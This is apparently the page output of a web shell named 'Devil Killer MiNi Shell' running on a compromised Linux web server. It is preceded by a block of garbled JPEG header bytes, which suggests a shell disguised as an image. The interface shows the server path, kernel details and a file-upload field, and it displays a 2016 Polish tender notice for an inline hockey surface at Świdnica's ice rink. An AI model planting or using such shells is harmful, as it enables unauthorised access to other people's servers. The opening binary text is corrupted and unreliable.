JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161209/363814-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.osir.swidnica.pl/o nas/przetargi' target='_blank'>http://www.osir.swidnica.pl/o nas/przetargi</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 363814 - 2016
              z dnia 2016-12-09 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Świdnica: DOSTAWA NAWIERZCHNI DO GRY  W  INLINE HOKEY WRAZ Z  WYMIANĄ WYPOSAŻENIA HALI LODOWISKA PRZY UL.ŚLĄSKIEJ 35 w ŚWIDNICY<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Świdnicki Ośrodek Sportu i Rekreacji, krajowy numer identyfikacyjny
              65270200000, ul.
              ul. Śląska 
              35,
              58100  
              Świdnica, woj.
              dolnośląskie, państwo
              Polska, tel.
              074 8521262, 8532536, e-mail
              dyrektor@sosir.swidnica.pl, faks
              074 8521262, 8532536.
              <br />
              Adres strony internetowej (URL): www.osir.swidnica.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.osir.swidnica.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.osir.swidnica.pl/o nas/przetargi</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.osir.swidnica.pl/o nas/przetargi</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>DOSTAWA NAWIERZCHNI DO GRY  W  INLINE HOKEY WRAZ Z  WYMIANĄ WYPOSAŻENIA HALI LODOWISKA PRZY UL.ŚLĄSKIEJ 35 w ŚWIDNICY<br /><b>Numer referencyjny: </b>p29/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	PRZEDMIOT ZAMÓWIENIA
Przedmiotem zamówienia jest realizacja zadania pn.:  DOSTAWA NAWIERZCHNI DO GRY  W  INLINE HOKEY WRAZ Z  WYMIANĄ WYPOSAŻENIA HALI LODOWISKA PRZY UL.ŚLĄSKIEJ 35 w ŚWIDNICY  , w ramach inwestycji : pod nazwą:    Modernizacja Lodowiska obejmująca budowę miejsc postojowych, wentylacji mechanicznej remont oświetlenia i nagłośnienia przebudowę części pomieszczeń obiektu lodowiska Świdnickiego Ośrodka Sportu i Rekreacji przy ulicy Śląskiej 33 w Świdnicy.  

1.1  Dostawa realizowana będzie na podstawie dokumentacji technicznej     Archikon Robert Kryśpiak , 58-100 Świdnica, ul. Armii Krajowej 29 zawierającej:  

1.2 Szczegółowy zakres dostawy określa zestawienie rzeczowe dostawy, opis techniczny dostawy i montażu, które stanowią załącznik do niniejszej specyfikacji   znajdują się na stronie internetowej Zamawiającego www.osir.swidnica.pl w katalogu zamówienia publiczne. 

1.3  Zakres dostawy  obejmuje dostawę fabrycznie nowych :

1.
1) dostawę i montaż nawierzchni do gry w Inline Hokey wraz z podkładem technologicznym,
z liniami pola gry, polami bramkowymi i strefami wznowienia gry w ramach Światowych Igrzysk Sportowych 2017
2) wykonanie osłon o wysokości 1,60-2,00 m ponad górną krawędź poręczówki band zabezpieczających strefy za bramkowe na obu końcach boiska; osłony mocowane do istniejącej konstrukcji band hokejowych,
3) wykonanie osłon o wysokości co najmniej 0,80-1,00 m ponad górną krawędź band zabezpieczających na całej długości długich boków boiska z wyłączeniem strefy boksów dla zawodników; osłony mocowane do istniejącej konstrukcji band hokejowych,
4) dostawa i montaż siatek zabezpieczających pola za bramkowe o długości 40 m i wysokości 4 m każda  2szt.
5) wykonanie boksów dla zawodników, boksów kar i boksu sędziowskiego z nawierzchnią jak do gry w Inline Hokeya  oraz osłonami zabezpieczającymi,
6) dostawa i montaż ławek do boksów zawodników  8 szt. długości 2 m każda,
7) dostawa i montaż ławek do boksów kar i sędziów  3 szt. długości 2 m każda,
8) dostawa 2 sztuk bramek zgodnych z przepisami Międzynarodowej Federacji Inline Hokeya  oraz 2 sztuk bramek uniwersalnych, które będą wykorzystane poza turniejami i zawodami sportowymi do celów treningowych i rekreacyjnych,
9) dostawa 1000 sztuk krążków do gry w Inline Hokeya z logo Światowych Igrzysk Sportowych 2017
10) dostawa i montaż do zaplecza szatniowego: ławo-wieszaków (lxbxh=200x165x40 cm) - 10 szt.
11) dostawa i montaż do zaplecza biura zawodów:
- krzeseł konferencyjnych (stal+sklejka) kolor czarny - 30 szt.
- stołu konferencyjnego 100x360x76 cm (stelaż z drewna klejonego, blat fornirowany), kolor drewno malowane na ciemny palisander - 1 szt.
- biurek 100x60x76 cm (płyta wiorowa+laminat) z podręczną szufladą i półką w  kolorze
jasnoszarym - 2szt.
- szafy 80x55x197 (płyta wiorowa + laminat) w kolorze jasnoszarym dostosowanym
do koloru biurka  2 szt.
- krzeseł do biurka (stal+sklejka bukowa) kolor czarny, krzesło obrotowe na 5 nogach z kołkami - 2 szt.;

2. Opis rozwiązań konstrukcyjno materiałowych 
1) Nawierzchnia do gry w Inline Hokey - modułowa nawierzchnia sportowa polipropylenowa z podkładem technologicznym (tłumiącym) zostanie zamontowana na betonowej płycie zasadniczej obiektu o powierzchni 30 m x 60m i promieniu łuków 8,5m oraz w boksach zawodników, kar i sędziów. Musi posiadać  linie pola gry, pola bramkowe i strefy wznowienia gry spełniającymi wymogi Międzynarodowej Federacji Inline Hokeya oraz posiadać oznaczenie graficzne figur do rozgrywania zawodów wrotkarstwa figurowego w ramach Światowych Igrzysk Sportowych 2017.
Zamawiający wymaga, aby nawierzchnia stanowiąca przedmiot zamówienia spełniała następujące warunki:
- Przeznaczenie: do rozgrywek Inline Hokeya oraz prowadzenia zajęć sportowych w zakresie piłki ręcznej, siatkówki, koszykówki,  piłki nożnej, uni hokeja, jazdy na wrotkach i rolkach, tenisa ziemnego, badmintona, zajęć osób niepełnosprawnych w tym na wózkach.   
- Nawierzchnia musi być wykonana z modularnego polipropylenu do użytkowania w obiektach zamkniętych.
- Wymagany wymiar płyt: -
-	długość:     310-340 mm 
-	szerokość:  310-340 mm 
      -     wysokość:     11-13 mm
- W zakres dostawy wchodzi również podkład tłumiąco  ponieważ nawierzchnia zostanie ułożona na płycie betonowej obiektu sztucznego lodowiska w okresie poza jego mrożeniem 
- Nawierzchnia musi cechować się:
-	szybkim czasem montażu,
-	zatrzaskowym systemem łączenia płyt ze sobą (jedna płyta musi posiadać minimum 16 elementów zatrzaskowych)
-	 odpornością na uszkodzenia mechaniczne,
-	łatwością mycia za pomocą ogólnie dostępnych środków utrzymywania czystości,
-	nie wymagalnością konserwacji,
-	odpornością na zmianę temperatur w zakresie od  - 10C do + 50C 
-	odpornością na zmianę wilgotności 
-	małą powierzchnią magazynowania.
-	brakiem uwarunkowań odnośnie magazynowania w pomieszczeniach o podwyższonej wilgotności

- Zamawiający wymaga aby nawierzchnia posiadała stosowne atesty w tym atest higieny i świadectwo badań na niepalność. Nawierzchnia musi posiadać odpowiednią dokumentację certyfikacyjną dopuszczającą jej zastosowanie w zawodach Mistrzostw Świata lub Światowych Igrzysk Sportowych na poziomie zawodów seniorskich.  
- Wykonawca winien przewidzieć w swojej ofercie do stawę montaż podłogi:
	do 16 czerwca 2017 r. przed finałem mistrzostw Polski w In-Line hokeya 
	Montaż nie może rozpocząć się wcześniej niż 7 czerwca 2017 r. 
 

3. Osłony zabezpieczające  słupkowe 
a) osłony zabezpieczające pola za bramkowe - osłony o wysokości 1,60 - 2,00 m
ponad górną krawędź bandy, wykonane z pleksiglasu, poliwęglanu lub szkła hartowanego o grubości 12-15 mm odpornego na uderzenia krążka hokejowego; osłony dedykowane dla boisk hokejowych, montowane do istniejących band będących w posiadaniu Zamawiającego.
Osłony powinny być przedłużone o 4 metry, mierząc od linii bramkowej, w kierunku
stref neutralnych,
b) osłony zabezpieczające boczną podłużną linię boiska - osłony o wysokości co najmniej 0,80 m ponad górną krawędź bandy, wykonane z pleksiglasu, poliwęglanu lub szkła hartowanego o grubości 12-15 mm odpornego na uderzenia krążka hokejowego; osłony dedykowane dla boisk hokejowych, montowane do istniejących band będących w posiadaniu Zamawiającego, osłony wykonać na całej długości wzdłuż band bocznych po obu
stronach boiska, z wyłączeniem strefy ławek graczy.
Uwaga:
 Szczeliny pomiędzy panelami osłony powinny być zminimalizowane do 3-5 mm
 Miejsca zakończeń osłon powinny zostaną zabezpieczone okładzinami zabezpieczającymi
graczy przed kontuzjami.
 Nie zezwala się na żadne części ruchome i otwierane wmontowane w osłony
4. Siatki ochronne
W strefach końcowych ponad bandami i osłonami muszą być zainstalowane siatki ochronne o wysokości 4m i szerokości 40m w kolorze czarnym z włókien poliamidowych o maksymalnym rozmiarze oczka 40 x 40mm.

5. Boksy dla zawodników

Wykonanie boksów dla zawodników z nawierzchnią jak do gry w Inline Hokeya o wymiarach: 2 boksy o długości 10 m  i szerokości 2,2m. Wysokość boksu jak wysokość band 1,2m wykonany o konstrukcji stalowej ocynkowanej, z wypełnieniem wewnętrznym płytą PEHD o min grubości 5mm, z przerwą odległościową między boksami 4-6m. Każdy boks musi posiadać 1 bramkę do wejścia zewnętrznego i 2 bramki do wyjścia na boisko.

6. Boksy kar i sędziów

Wykonanie boksów kar i boksu sędziowskiego z nawierzchnią jak do gry w Inline Hokeya z platformą podłogową  wraz osłonami zabezpieczającymi o wymiarach: 2 boksy kar o długości 4 m  i szerokości 2,5m, 1 boks sędziów o długości 6m i szerokości 2,5m. Wysokość boksu jak wysokość band 1,2m wykonany o konstrukcji stalowej ocynkowanej, z wypełnieniem wewnętrznym płytą PEHD o min grubości 5mm,. Z boksów kar po jednej bramce wejście/wyjście na boisko. Boks sędziowski z bramką zewnętrzną bez wyjścia na boisko. Boksy muszą posiadać osłony zabezpieczające osłony o wysokości co najmniej 0,80 m ponad górną krawędź bandy, wykonane z pleksiglasu, poliwęglanu lub szkła hartowanego o grubości 10-15 mm odpornego na uderzenia krążka hokejowego.

7. Ławki do boksów

Dostawa i montaż ławek z oparciami do boksów zawodników  8 szt. długości 2 m każda dedykowane jak dla hokeja.
Dostawa i montaż ławek do boksów kar i sędziów  3 szt. długości 2 m każda, dedykowane jak dla hokeja.

8. Bramki do gry
Dostawa 2 sztuk bramek zgodnych z przepisami Międzynarodowej Federacji Inline Hokeya  oraz 2 sztuk bramek uniwersalnych, które będą wykorzystane poza turniejami i zawodami sportowymi do celów treningowych i rekreacyjnych, dla Inline Hokeya i hokeja.

9. Krążki do gry
Dostawa 1000 sztuk krążków do gry w Inline Hokeya z logo Światowych Igrzysk Sportowych 2017  wzór logo dostarcza Zamawiający

10. Wyposażenie dodatkowe:
- Dostawa i montaż do zaplecza szatniowego: ławo-wieszaków (lxbxh=200x165x40 cm) - 10 szt.

- Dostawa i montaż do zaplecza biura zawodów:
*krzeseł konferencyjnych (stal+sklejka) kolor czarny - 30 szt.

- stołu konferencyjnego 100x360x76 cm (stelaż z drewna klejonego, blat fornirowany), kolor drewno malowane na ciemny palisander - 1 szt.
- biurek 100x60x76 cm (płyta wiorowa+laminat) z podręczną szufladą i półką w  kolorze
jasnoszarym - 2szt.

- szafy 80x55x197 (płyta wiorowa + laminat) w kolorze jasnoszarym dostosowanym
do koloru biurka  2 szt.

- krzeseł do biurka (stal+sklejka bukowa) kolor czarny, krzesło obrotowe na 5 nogach z kołkami - 2 szt.;

- Wykonawca zamówienia zainstaluje przedmiot zamówienia na terenie obiektu w terminie odrębnie uzgodnionym oraz przeszkoli pracowników Zamawiającego w zakresie montażu, demontażu i użytkowania. 

UWAGA: Na etapie składania ofert Zamawiający nie wymaga składania certyfikatów, atestów, deklaracji zgodności i zezwoleń dotyczących przedmiotu dostawy. Wyłoniony wykonawca zobowiązany będzie do dostarczenia ich   przed podpisaniem umowy.
<br /><br /><b>II.5) Główny kod CPV: </b>37400000-2<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              416197.56<br />
              Waluta:
              <br /><div style="padding-left: 20px">pln<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 16/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia w/w warunek, <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy, że spełnia w/w warunek, <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże się posiadaniem wiedzy i doświadczenia zawodowego, wyrażającego się wykonaniem w okresie ostatnich trzech lat licząc od dnia wszczęcia postępowania o udzielenie niniejszego zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej jednej dostawy  wyposażenia obiektu sportowego o wartości 300.000,00 zł brutto, oraz załączeniem dowodów, że dostawa została wykonane należycie.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">oświadczenie wykonawcy, o braku podstaw do wykluczenia wg załącznika nr 3,
8.2.2.   oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej wg załącznika nr 4. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Powyższe oświadczenie wykonawcy przekazują zamawiającemu w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust.5 ustawy.
8.2.3.  aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji              o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.5 pkt.1 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
8.2.4. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż  3 miesiące przed upływem terminu składania ofert,
8.2.5.  aktualne zaświadczenie  właściwej terenowej jednostki organizacyjnej ZUS lub KRUS albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne lub  inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym  organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
8.3  jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej , zamiast dokumentów, o których mowa w pkt. 8.2.3,  8.2.4 i 8.2.5 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
            a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości,
            b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo, że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
